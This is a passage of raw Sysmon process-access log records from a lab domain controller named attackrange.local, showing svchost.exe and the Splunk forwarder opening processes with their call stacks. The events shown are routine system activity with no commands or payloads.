Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002016Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.074{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16A5-5F84-2200-000000007F01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002015Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.074{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16A5-5F84-2200-000000007F01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002014Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.074{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16A5-5F84-2200-000000007F01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002013Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.074{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16A5-5F84-2200-000000007F01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002012Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.074{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16A5-5F84-2200-000000007F01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002011Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.074{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16A5-5F84-2200-000000007F01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002010Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.074{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16A5-5F84-2200-000000007F01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002009Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.074{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16A5-5F84-2200-000000007F01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002008Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.074{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16A5-5F84-2200-000000007F01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002007Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.074{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16A5-5F84-2200-000000007F01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002006Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.074{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16A5-5F84-2200-000000007F01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002005Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.074{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16A5-5F84-2200-000000007F01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002004Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.058{5D479F2C-16B5-5F84-5700-000000007F01}37323776C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{5D479F2C-16B1-5F84-3000-000000007F01}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002003Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.058{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16A5-5F84-2200-000000007F01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002002Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.058{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16A5-5F84-2200-000000007F01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002001Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.058{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16A5-5F84-2200-000000007F01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002000Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.043{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16A5-5F84-2200-000000007F01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001999Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.043{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16A5-5F84-2200-000000007F01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001998Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.043{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16A5-5F84-2200-000000007F01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001997Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.043{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16A5-5F84-2200-000000007F01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001996Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.043{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16A5-5F84-2200-000000007F01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001995Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.043{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16A5-5F84-2200-000000007F01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001994Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.027{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16A5-5F84-2200-000000007F01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001993Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.027{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16A5-5F84-2200-000000007F01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001992Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 